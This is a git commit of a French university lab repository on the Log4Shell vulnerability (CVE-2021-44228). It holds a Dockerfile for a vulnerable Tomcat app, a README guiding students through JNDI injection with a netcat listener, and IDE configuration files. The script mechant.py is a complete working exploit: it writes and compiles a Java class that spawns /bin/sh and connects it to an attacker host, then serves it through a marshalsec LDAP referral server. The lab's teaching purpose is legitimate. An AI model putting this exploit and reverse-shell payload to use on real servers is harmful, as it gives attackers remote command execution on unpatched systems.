TP_Secu
/
TP_Log_4_Shell
5
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

add all files

Browse Source
master
Audric-S 1 year ago
commit 29358d113d
38 changed files with 924 additions and 0 deletions
Show Stats Download Patch File Download Diff File

6
Dockerfile
Unescape View File

@ -0,0 +1,6 @@
FROM tomcat:8.0.36-jre8
RUN rm -rf /usr/local/tomcat/webapps/*
ADD vulnerable-application/cible/log4shell-1.0-SNAPSHOT.war /usr/local/tomcat/webapps/ROOT.war
EXPOSE 8080
CMD ["catalina.sh", "run"]

110
README.md
Unescape View File

@ -0,0 +1,110 @@
# TP Log4Shell
## Rappel:
Ce TP a pour but de vous faire découvrir l'exploitation de la vulnérabilité **CVE-2021-44228** qui touche la bibliothèque Log4J. À cause d'elle, un attaquant peut injecter du code dans les logs du serveur qui sera interprété. De plus, l'API **JNDI** sera utilisée. Elle permet aux applications Java de rechercher et d'accéder à des ressources (objets) distantes gérées de manière centralisée via des annuaires, souvent **LDAP**. L'attaquant peut donc, via son injection, rediriger l'application pour récupérer un objet distant via JNDI et l'intégrer à son code. Bien sûr, cette ressource ne sera pas forcément bienveillante envers le serveur hébergeant l'application...
![Alt text](image/schema.png)
<div align="center">fig.1 - Représentation de l'attaque</div>
## Mise en place de l'attaque :
### L'application vulnérable :
Nous allons simuler un simple serveur web qui utilise mal l'API log4j2 et ne vérifie pas les entrée de l'utilisateur avant de les écrire dans les logs du serveur.
Pour simuler ce serveur vulnérable nous vous proposons une simple application web Java. Elle contient simplement une page de login dans laquelle l'utilisateur peut se connecter.
**Tout d'abord lancez vdn sur le réseau `secure`.**
Vous devrez ensuite <u>**cloner ce dépôt**</u> puis travailler dedans.
Pour déployer cette application nous allons utiliser Docker comme ceci :
```Bash
sudo docker build -t vulnerable-app .
sudo docker run -it --ulimit nofile=122880:122880 --network host vulnerable-app
```
Maintenant l'application tourne en local sur le port **8080**.
<u>Question:</u> :question:
>En rentrant un identifiant au hasard, assurez vous que le serveur ecrit bien un message d'erreur dans les logs du serveur avec votre identifiant.
Comme vous le savez, l'injection se base sur le fait que quand on attribut à une variable une chaîne de charactère de la forme ${maVaribale}, c'est la valeur de maVariable qui va être attribué.
<u>Question:</u> :question:
> Testez d'afficher la version de java utiliser par l'application dans les logs du serveur. Pour obtenir la version de java nous utilisons la variable : **java:version**.
Si vous y arrivez, vous comprenez donc bien que **java:version** à été interprété. La faille se base donc sur ce problème, l'attaquant peut donc réaliser ce qu'il veut. Vous vous doutez bien qu'il ne va pas simplement afficher la version de Java...
<u>Question:</u> :question:
> En cherchant dans le code source de l'application vulnérable, selon vous, quelles lignes de code sont responsables de la vulnérabilité ?
### Votre serveur d'attaquant (LDAP) :
Le but de cette section est de mettre en place un serveur que vous contrôlez en tant qu'attaquant. Ce serveur traite des requêtes JNDI/LDAP et réponds du code malveillant. (voir étapes 2-3 de la fig.1).
Pour créer ce fameux serveur qui vous permettra de donner un script d'infection à utilisé au serveur cible, nous auront besoin d'installer le **java jdk**.
```Bash
tar -xf jdk-8u20-linux-x64.tar.gz
```
<u>Question:</u> :question:
> Aller dans le fichier qui créé le serveur LDAP et met à disposition le code malveillant si on le requête de la bonne façon. Le **payload** est le bout de code qui permet d'infecté le serveur vulnérable. Selon vous, que fait le payload ici? (_Nous attendons ici le plus de détails possible_)
Executer cette commande qui va mettre en place le serveur LDAP pret à repondre une requête avec le payload permettant de faire ce que vous avez vu à la question précédente.
```Bash
python3 mechant.py --userip localhost --lport 9001
```
### Préparer la liaison entre le serveur cible et votre machine attaquante :
Pour avoir une interaction avec le serveur infecté, nous devons écouter si d'éventuelles connexions ont lieu depuis celui-ci (voir étape 5 de la fig.1). Pour ce faire utilisez netcat avec les bon arguments.
<u>Question:</u> :question:
>Nous voulons que netcat :
> * fonctionne en mode écoute, c'est-à-dire d'attendre une connexion entrante.
> * active le mode verbeux pour afficher des informations détaillées sur les connexions entrantes et sortantes.
> * désactive la résolution DNS
>
>Evidemment, Netcat doit écouter sur le **bon port**.
## Place à l'attaque :
Maintenant que nous sommes prêts, attaquons !
<u>Question:</u> :question:
> Faite une injection en utilisant jndi qui requêttera votre serveur mis en place précédement qui à l'adresse ... et écoute atuellement sur le port n°.... avec le script /CeQueVousVoulez. Nous n'avons pas besoins de spécifié de scripts précis dans notre cas car notre serveur répond toujours la même chose quand on le requête.
<u>Question:</u> :question:
> Que pouvez-vous faire sur le serveur attaqué ?
> Quels sont vos droits (Oui, cela fait peur...)?
## Questions supplémentaires
Allez sur le site **https://log4shell.tools/** et tester encore une fois la vulnérabilité du serveur cible.
1. Cliquez sur start pour gérer une injection jndi
2. Injecter la requête jndi dans le login
3. Revenez sur le site et observez....

BIN
image/ldap.png
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 43 KiB

BIN
image/schema.png
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 166 KiB

BIN
jdk-8u20-linux-x64.tar.gz
View File

Binary file not shown.

139
mechant.py
Unescape View File

@ -0,0 +1,139 @@
#!/usr/bin/env python3
import argparse
from colorama import Fore, init
import subprocess
import threading
from pathlib import Path
import os
from http.server import HTTPServer, SimpleHTTPRequestHandler
CUR_FOLDER = Path(__file__).parent.resolve()
def generate_payload(userip: str, lport: int) -> None:
program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="%s";
int port=%d;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),
pe=p.getErrorStream(),
si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
""" % (userip, lport)
# writing the exploit to Exploit.java file
p = Path("Exploit.java")
try:
p.write_text(program)
subprocess.run([os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/javac"), str(p)])
except OSError as e:
print(Fore.RED + f'[-] Something went wrong {e}')
raise e
else:
print(Fore.GREEN + '[+] Exploit java class created success')
def payload(userip: str, webport: int, lport: int) -> None:
generate_payload(userip, lport)
print(Fore.GREEN + '[+] Setting up LDAP server\n')
# create the LDAP server on new thread
t1 = threading.Thread(target=ldap_server, args=(userip, webport))
t1.start()
# start the web server
print(Fore.GREEN + f"[+] Starting Webserver listening on http://localhost:1389")
httpd = HTTPServer(('0.0.0.0', webport), SimpleHTTPRequestHandler)
httpd.serve_forever()
def check_java() -> bool:
exit_code = subprocess.call([
os.path.join(CUR_FOLDER, 'jdk1.8.0_20/bin/java'),
'-version',
], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
return exit_code == 0
def ldap_server(userip: str, lport: int) -> None:
print(Fore.GREEN + f"[+] Send me a jndi request")
url = "http://{}:{}/#Exploit".format(userip, lport)
subprocess.run([
os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/java"),
"-cp",
os.path.join(CUR_FOLDER, "vulnerable-application/cible/marshalsec-0.0.3-SNAPSHOT-all.jar"),
"marshalsec.jndi.LDAPRefServer",
url,
])
def main() -> None:
init(autoreset=True)
parser = argparse.ArgumentParser(description='log4shell PoC')
parser.add_argument('--userip',
metavar='userip',
type=str,
default='localhost',
help='Enter IP for LDAPRefServer & Shell')
parser.add_argument('--webport',
metavar='webport',
type=int,
default='8000',
help='listener port for HTTP port')
parser.add_argument('--lport',
metavar='lport',
type=int,
default='9001',
help='Netcat Port')
args = parser.parse_args()
try:
if not check_java():
print(Fore.RED + '[-] Java is not installed inside the repository')
raise SystemExit(1)
payload(args.userip, args.webport, args.lport)
except KeyboardInterrupt:
print(Fore.RED + "user interrupted the program.")
raise SystemExit(0)
if __name__ == "__main__":
main()

2
requirements.txt
Unescape View File

@ -0,0 +1,2 @@
colorama
argparse

1
vulnerable-application/.gitignore vendored
Unescape View File

@ -0,0 +1 @@
target/*

8
vulnerable-application/.idea/.gitignore vendored
Unescape View File

@ -0,0 +1,8 @@
# Default ignored files
/shelf/
/workspace.xml
# Editor-based HTTP Client requests
/httpRequests/
# Datasource local storage ignored files
/dataSources/
/dataSources.local.xml

16
vulnerable-application/.idea/artifacts/log4shell_war.xml
Unescape View File

@ -0,0 +1,16 @@
<component name="ArtifactManager">
<artifact type="war" name="log4shell:war">
<output-path>$PROJECT_DIR$/target</output-path>
<properties id="maven-jee-properties">
<options>
<exploded>false</exploded>
<module>log4shell</module>
<packaging>war</packaging>
<unpackNestedArchives>false</unpackNestedArchives>
</options>
</properties>
<root id="archive" name="log4shell-1.0-SNAPSHOT.war">
<element id="artifact" artifact-name="log4shell:war exploded" />
</root>
</artifact>
</component>

28
vulnerable-application/.idea/artifacts/log4shell_war_exploded.xml
Unescape View File

@ -0,0 +1,28 @@
<component name="ArtifactManager">
<artifact type="exploded-war" name="log4shell:war exploded">
<output-path>$PROJECT_DIR$/target/log4shell-1.0-SNAPSHOT</output-path>
<properties id="maven-jee-properties">
<options>
<exploded>true</exploded>
<module>log4shell</module>
<packaging>war</packaging>
<unpackNestedArchives>false</unpackNestedArchives>
</options>
</properties>
<root id="root">
<element id="directory" name="WEB-INF">
<element id="directory" name="classes">
<element id="module-output" name="log4shell" />
</element>
<element id="directory" name="lib">
<element id="library" level="project" name="Maven: org.apache.logging.log4j:log4j-core:2.14.1" />
<element id="library" level="project" name="Maven: org.apache.logging.log4j:log4j-api:2.14.1" />
</element>
</element>
<element id="directory" name="META-INF">
<element id="file-copy" path="$PROJECT_DIR$/target/log4shell-1.0-SNAPSHOT/META-INF/MANIFEST.MF" />
</element>
<element id="javaee-facet-resources" facet="log4shell/web/Web" />
</root>
</artifact>
</component>

16
vulnerable-application/.idea/compiler.xml
Unescape View File

@ -0,0 +1,16 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="CompilerConfiguration">
<annotationProcessing>
<profile name="Maven default annotation processors profile" enabled="true">
<sourceOutputDir name="target/generated-sources/annotations" />
<sourceTestOutputDir name="target/generated-test-sources/test-annotations" />
<outputRelativeToContentRoot value="true" />
<module name="log4shell" />
</profile>
</annotationProcessing>
<bytecodeTargetLevel>
<module name="log4shell" target="1.8" />
</bytecodeTargetLevel>
</component>
</project>

7
vulnerable-application/.idea/encodings.xml
Unescape View File

@ -0,0 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="Encoding">
<file url="file://$PROJECT_DIR$/src/main/java" charset="UTF-8" />
<file url="file://$PROJECT_DIR$/src/main/resources" charset="UTF-8" />
</component>
</project>

20
vulnerable-application/.idea/jarRepositories.xml
Unescape View File

@ -0,0 +1,20 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="RemoteRepositoriesConfiguration">
<remote-repository>
<option name="id" value="central" />
<option name="name" value="Central Repository" />
<option name="url" value="https://repo.maven.apache.org/maven2" />
</remote-repository>
<remote-repository>
<option name="id" value="central" />
<option name="name" value="Maven Central repository" />
<option name="url" value="https://repo1.maven.org/maven2" />
</remote-repository>
<remote-repository>
<option name="id" value="jboss.community" />
<option name="name" value="JBoss Community repository" />
<option name="url" value="https://repository.jboss.org/nexus/content/repositories/public/" />
</remote-repository>
</component>
</project>

13
vulnerable-application/.idea/libraries/Maven__javax_servlet_javax_servlet_api_4_0_1.xml
Unescape View File

@ -0,0 +1,13 @@
<component name="libraryTable">
<library name="Maven: javax.servlet:javax.servlet-api:4.0.1">
<CLASSES>
<root url="jar://$MAVEN_REPOSITORY$/javax/servlet/javax.servlet-api/4.0.1/javax.servlet-api-4.0.1.jar!/" />
</CLASSES>
<JAVADOC>
<root url="jar://$MAVEN_REPOSITORY$/javax/servlet/javax.servlet-api/4.0.1/javax.servlet-api-4.0.1-javadoc.jar!/" />
</JAVADOC>
<SOURCES>
<root url="jar://$MAVEN_REPOSITORY$/javax/servlet/javax.servlet-api/4.0.1/javax.servlet-api-4.0.1-sources.jar!/" />
</SOURCES>
</library>
</component>

13
vulnerable-application/.idea/libraries/Maven__org_apache_logging_log4j_log4j_api_2_14_1.xml
Unescape View File

@ -0,0 +1,13 @@
<component name="libraryTable">
<library name="Maven: org.apache.logging.log4j:log4j-api:2.14.1">
<CLASSES>
<root url="jar://$MAVEN_REPOSITORY$/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar!/" />
</CLASSES>
<JAVADOC>
<root url="jar://$MAVEN_REPOSITORY$/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1-javadoc.jar!/" />
</JAVADOC>
<SOURCES>
<root url="jar://$MAVEN_REPOSITORY$/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1-sources.jar!/" />
</SOURCES>
</library>
</component>

13
vulnerable-application/.idea/libraries/Maven__org_apache_logging_log4j_log4j_core_2_14_1.xml
Unescape View File

@ -0,0 +1,13 @@
<component name="libraryTable">
<library name="Maven: org.apache.logging.log4j:log4j-core:2.14.1">
<CLASSES>
<root url="jar://$MAVEN_REPOSITORY$/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.jar!/" />
</CLASSES>
<JAVADOC>
<root url="jar://$MAVEN_REPOSITORY$/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1-javadoc.jar!/" />
</JAVADOC>
<SOURCES>
<root url="jar://$MAVEN_REPOSITORY$/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1-sources.jar!/" />
</SOURCES>
</library>
</component>

13
vulnerable-application/.idea/libraries/Maven__org_apiguardian_apiguardian_api_1_1_0.xml
Unescape View File

@ -0,0 +1,13 @@
<component name="libraryTable">
<library name="Maven: org.apiguardian:apiguardian-api:1.1.0">
<CLASSES>
<root url="jar://$MAVEN_REPOSITORY$/org/apiguardian/apiguardian-api/1.1.0/apiguardian-api-1.1.0.jar!/" />
</CLASSES>
<JAVADOC>
<root url="jar://$MAVEN_REPOSITORY$/org/apiguardian/apiguardian-api/1.1.0/apiguardian-api-1.1.0-javadoc.jar!/" />
</JAVADOC>
<SOURCES>
<root url="jar://$MAVEN_REPOSITORY$/org/apiguardian/apiguardian-api/1.1.0/apiguardian-api-1.1.0-sources.jar!/" />
</SOURCES>
</library>
</component>

13
vulnerable-application/.idea/libraries/Maven__org_junit_jupiter_junit_jupiter_api_5_7_1.xml
Unescape View File

@ -0,0 +1,13 @@
<component name="libraryTable">
<library name="Maven: org.junit.jupiter:junit-jupiter-api:5.7.1">
<CLASSES>
<root url="jar://$MAVEN_REPOSITORY$/org/junit/jupiter/junit-jupiter-api/5.7.1/junit-jupiter-api-5.7.1.jar!/" />
</CLASSES>
<JAVADOC>
<root url="jar://$MAVEN_REPOSITORY$/org/junit/jupiter/junit-jupiter-api/5.7.1/junit-jupiter-api-5.7.1-javadoc.jar!/" />
</JAVADOC>
<SOURCES>
<root url="jar://$MAVEN_REPOSITORY$/org/junit/jupiter/junit-jupiter-api/5.7.1/junit-jupiter-api-5.7.1-sources.jar!/" />
</SOURCES>
</library>
</component>

13
vulnerable-application/.idea/libraries/Maven__org_junit_jupiter_junit_jupiter_engine_5_7_1.xml
Unescape View File

@ -0,0 +1,13 @@
<component name="libraryTable">
<library name="Maven: org.junit.jupiter:junit-jupiter-engine:5.7.1">
<CLASSES>
<root url="jar://$MAVEN_REPOSITORY$/org/junit/jupiter/junit-jupiter-engine/5.7.1/junit-jupiter-engine-5.7.1.jar!/" />
</CLASSES>
<JAVADOC>
<root url="jar://$MAVEN_REPOSITORY$/org/junit/jupiter/junit-jupiter-engine/5.7.1/junit-jupiter-engine-5.7.1-javadoc.jar!/" />
</JAVADOC>
<SOURCES>
<root url="jar://$MAVEN_REPOSITORY$/org/junit/jupiter/junit-jupiter-engine/5.7.1/junit-jupiter-engine-5.7.1-sources.jar!/" />
</SOURCES>
</library>
</component>

13
vulnerable-application/.idea/libraries/Maven__org_junit_platform_junit_platform_commons_1_7_1.xml
Unescape View File

@ -0,0 +1,13 @@
<component name="libraryTable">
<library name="Maven: org.junit.platform:junit-platform-commons:1.7.1">
<CLASSES>
<root url="jar://$MAVEN_REPOSITORY$/org/junit/platform/junit-platform-commons/1.7.1/junit-platform-commons-1.7.1.jar!/" />
</CLASSES>
<JAVADOC>
<root url="jar://$MAVEN_REPOSITORY$/org/junit/platform/junit-platform-commons/1.7.1/junit-platform-commons-1.7.1-javadoc.jar!/" />
</JAVADOC>
<SOURCES>
<root url="jar://$MAVEN_REPOSITORY$/org/junit/platform/junit-platform-commons/1.7.1/junit-platform-commons-1.7.1-sources.jar!/" />
</SOURCES>
</library>
</component>

13
vulnerable-application/.idea/libraries/Maven__org_junit_platform_junit_platform_engine_1_7_1.xml
Unescape View File

@ -0,0 +1,13 @@
<component name="libraryTable">
<library name="Maven: org.junit.platform:junit-platform-engine:1.7.1">
<CLASSES>
<root url="jar://$MAVEN_REPOSITORY$/org/junit/platform/junit-platform-engine/1.7.1/junit-platform-engine-1.7.1.jar!/" />
</CLASSES>
<JAVADOC>
<root url="jar://$MAVEN_REPOSITORY$/org/junit/platform/junit-platform-engine/1.7.1/junit-platform-engine-1.7.1-javadoc.jar!/" />
</JAVADOC>
<SOURCES>
<root url="jar://$MAVEN_REPOSITORY$/org/junit/platform/junit-platform-engine/1.7.1/junit-platform-engine-1.7.1-sources.jar!/" />
</SOURCES>
</library>
</component>

13
vulnerable-application/.idea/libraries/Maven__org_opentest4j_opentest4j_1_2_0.xml
Unescape View File

@ -0,0 +1,13 @@
<component name="libraryTable">
<library name="Maven: org.opentest4j:opentest4j:1.2.0">
<CLASSES>
<root url="jar://$MAVEN_REPOSITORY$/org/opentest4j/opentest4j/1.2.0/opentest4j-1.2.0.jar!/" />
</CLASSES>
<JAVADOC>
<root url="jar://$MAVEN_REPOSITORY$/org/opentest4j/opentest4j/1.2.0/opentest4j-1.2.0-javadoc.jar!/" />
</JAVADOC>
<SOURCES>
<root url="jar://$MAVEN_REPOSITORY$/org/opentest4j/opentest4j/1.2.0/opentest4j-1.2.0-sources.jar!/" />
</SOURCES>
</library>
</component>

16
vulnerable-application/.idea/misc.xml
Unescape View File

@ -0,0 +1,16 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="FrameworkDetectionExcludesConfiguration">
<file type="web" url="file://$PROJECT_DIR$" />
</component>
<component name="MavenProjectsManager">
<option name="originalFiles">
<list>
<option value="$PROJECT_DIR$/pom.xml" />
</list>
</option>
</component>
<component name="ProjectRootManager" version="2" languageLevel="JDK_1_8" default="true" project-jdk-name="1.8" project-jdk-type="JavaSDK">
<output url="file://$PROJECT_DIR$/out" />
</component>
</project>

8
vulnerable-application/.idea/modules.xml
Unescape View File

@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectModuleManager">
<modules>
<module fileurl="file://$PROJECT_DIR$/log4shell.iml" filepath="$PROJECT_DIR$/log4shell.iml" />
</modules>
</component>
</project>

10
vulnerable-application/.idea/runConfigurations.xml
Unescape View File

@ -0,0 +1,10 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="RunConfigurationProducerService">
<option name="ignoredProducers">
<set>
<option value="com.android.tools.idea.compose.preview.runconfiguration.ComposePreviewRunConfigurationProducer" />
</set>
</option>
</component>
</project>

89
vulnerable-application/.idea/runConfigurations/Tomcat_7_0_94.xml
Unescape View File

@ -0,0 +1,89 @@
<component name="ProjectRunConfigurationManager">
<configuration default="false" name="Tomcat 7.0.94" type="#com.intellij.j2ee.web.tomcat.TomcatRunConfigurationFactory" factoryName="Local" APPLICATION_SERVER_NAME="Tomcat 7.0.94" ALTERNATIVE_JRE_ENABLED="true" ALTERNATIVE_JRE_PATH="$USER_HOME$/ctf/log4shell/jdk1.8.0_20/jre" nameIsGenerated="true">
<option name="UPDATING_POLICY" value="restart-server" />
<deployment>
<artifact name="log4shell:war exploded">
<settings>
<option name="CONTEXT_PATH" value="/" />
</settings>
</artifact>
</deployment>
<server-settings>
<option name="BASE_DIRECTORY_NAME" value="dc3fba46-0089-41b8-9784-43c8d500ff93" />
</server-settings>
<predefined_log_file enabled="true" id="Tomcat" />
<predefined_log_file enabled="true" id="Tomcat Catalina" />
<predefined_log_file id="Tomcat Manager" />
<predefined_log_file id="Tomcat Host Manager" />
<predefined_log_file id="Tomcat Localhost Access" />
<RunnerSettings RunnerId="Debug">
<option name="DEBUG_PORT" value="34845" />
</RunnerSettings>
<ConfigurationWrapper VM_VAR="JAVA_OPTS" RunnerId="Cover">
<option name="USE_ENV_VARIABLES" value="true" />
<STARTUP>
<option name="USE_DEFAULT" value="true" />
<option name="SCRIPT" value="" />
<option name="VM_PARAMETERS" value="" />
<option name="PROGRAM_PARAMETERS" value="" />
</STARTUP>
<SHUTDOWN>
<option name="USE_DEFAULT" value="true" />
<option name="SCRIPT" value="" />
<option name="VM_PARAMETERS" value="" />
<option name="PROGRAM_PARAMETERS" value="" />
</SHUTDOWN>
</ConfigurationWrapper>
<ConfigurationWrapper VM_VAR="JAVA_OPTS" RunnerId="Debug">
<option name="USE_ENV_VARIABLES" value="true" />
<STARTUP>
<option name="USE_DEFAULT" value="true" />
<option name="SCRIPT" value="" />
<option name="VM_PARAMETERS" value="" />
<option name="PROGRAM_PARAMETERS" value="" />
</STARTUP>
<SHUTDOWN>
<option name="USE_DEFAULT" value="true" />
<option name="SCRIPT" value="" />
<option name="VM_PARAMETERS" value="" />
<option name="PROGRAM_PARAMETERS" value="" />
</SHUTDOWN>
</ConfigurationWrapper>
<ConfigurationWrapper VM_VAR="JAVA_OPTS" RunnerId="Profile">
<option name="USE_ENV_VARIABLES" value="true" />
<STARTUP>
<option name="USE_DEFAULT" value="true" />
<option name="SCRIPT" value="" />
<option name="VM_PARAMETERS" value="" />
<option name="PROGRAM_PARAMETERS" value="" />
</STARTUP>
<SHUTDOWN>
<option name="USE_DEFAULT" value="true" />
<option name="SCRIPT" value="" />
<option name="VM_PARAMETERS" value="" />
<option name="PROGRAM_PARAMETERS" value="" />
</SHUTDOWN>
</ConfigurationWrapper>
<ConfigurationWrapper VM_VAR="JAVA_OPTS" RunnerId="Run">
<option name="USE_ENV_VARIABLES" value="true" />
<STARTUP>
<option name="USE_DEFAULT" value="true" />
<option name="SCRIPT" value="" />
<option name="VM_PARAMETERS" value="" />
<option name="PROGRAM_PARAMETERS" value="" />
</STARTUP>
<SHUTDOWN>
<option name="USE_DEFAULT" value="true" />
<option name="SCRIPT" value="" />
<option name="VM_PARAMETERS" value="" />
<option name="PROGRAM_PARAMETERS" value="" />
</SHUTDOWN>
</ConfigurationWrapper>
<method v="2">
<option name="Make" enabled="true" />
<option name="BuildArtifacts" enabled="true">
<artifact name="log4shell:war exploded" />
</option>
</method>
</configuration>
</component>

124
vulnerable-application/.idea/uiDesigner.xml
Unescape View File

@ -0,0 +1,124 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="Palette2">
<group name="Swing">
<item class="com.intellij.uiDesigner.HSpacer" tooltip-text="Horizontal Spacer" icon="/com/intellij/uiDesigner/icons/hspacer.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="1" hsize-policy="6" anchor="0" fill="1" />
</item>
<item class="com.intellij.uiDesigner.VSpacer" tooltip-text="Vertical Spacer" icon="/com/intellij/uiDesigner/icons/vspacer.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="1" anchor="0" fill="2" />
</item>
<item class="javax.swing.JPanel" icon="/com/intellij/uiDesigner/icons/panel.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3" />
</item>
<item class="javax.swing.JScrollPane" icon="/com/intellij/uiDesigner/icons/scrollPane.png" removable="false" auto-create-binding="false" can-attach-label="true">
<default-constraints vsize-policy="7" hsize-policy="7" anchor="0" fill="3" />
</item>
<item class="javax.swing.JButton" icon="/com/intellij/uiDesigner/icons/button.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="3" anchor="0" fill="1" />
<initial-values>
<property name="text" value="Button" />
</initial-values>
</item>
<item class="javax.swing.JRadioButton" icon="/com/intellij/uiDesigner/icons/radioButton.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="3" anchor="8" fill="0" />
<initial-values>
<property name="text" value="RadioButton" />
</initial-values>
</item>
<item class="javax.swing.JCheckBox" icon="/com/intellij/uiDesigner/icons/checkBox.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="3" anchor="8" fill="0" />
<initial-values>
<property name="text" value="CheckBox" />
</initial-values>
</item>
<item class="javax.swing.JLabel" icon="/com/intellij/uiDesigner/icons/label.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="0" anchor="8" fill="0" />
<initial-values>
<property name="text" value="Label" />
</initial-values>
</item>
<item class="javax.swing.JTextField" icon="/com/intellij/uiDesigner/icons/textField.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
<preferred-size width="150" height="-1" />
</default-constraints>
</item>
<item class="javax.swing.JPasswordField" icon="/com/intellij/uiDesigner/icons/passwordField.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
<preferred-size width="150" height="-1" />
</default-constraints>
</item>
<item class="javax.swing.JFormattedTextField" icon="/com/intellij/uiDesigner/icons/formattedTextField.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
<preferred-size width="150" height="-1" />
</default-constraints>
</item>
<item class="javax.swing.JTextArea" icon="/com/intellij/uiDesigner/icons/textArea.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JTextPane" icon="/com/intellij/uiDesigner/icons/textPane.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JEditorPane" icon="/com/intellij/uiDesigner/icons/editorPane.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JComboBox" icon="/com/intellij/uiDesigner/icons/comboBox.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="2" anchor="8" fill="1" />
</item>
<item class="javax.swing.JTable" icon="/com/intellij/uiDesigner/icons/table.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JList" icon="/com/intellij/uiDesigner/icons/list.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="2" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JTree" icon="/com/intellij/uiDesigner/icons/tree.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JTabbedPane" icon="/com/intellij/uiDesigner/icons/tabbedPane.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3">
<preferred-size width="200" height="200" />
</default-constraints>
</item>
<item class="javax.swing.JSplitPane" icon="/com/intellij/uiDesigner/icons/splitPane.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3">
<preferred-size width="200" height="200" />
</default-constraints>
</item>
<item class="javax.swing.JSpinner" icon="/com/intellij/uiDesigner/icons/spinner.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1" />
</item>
<item class="javax.swing.JSlider" icon="/com/intellij/uiDesigner/icons/slider.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1" />
</item>
<item class="javax.swing.JSeparator" icon="/com/intellij/uiDesigner/icons/separator.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3" />
</item>
<item class="javax.swing.JProgressBar" icon="/com/intellij/uiDesigner/icons/progressbar.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="0" fill="1" />
</item>
<item class="javax.swing.JToolBar" icon="/com/intellij/uiDesigner/icons/toolbar.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="0" fill="1">
<preferred-size width="-1" height="20" />
</default-constraints>
</item>
<item class="javax.swing.JToolBar$Separator" icon="/com/intellij/uiDesigner/icons/toolbarSeparator.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="0" anchor="0" fill="1" />
</item>
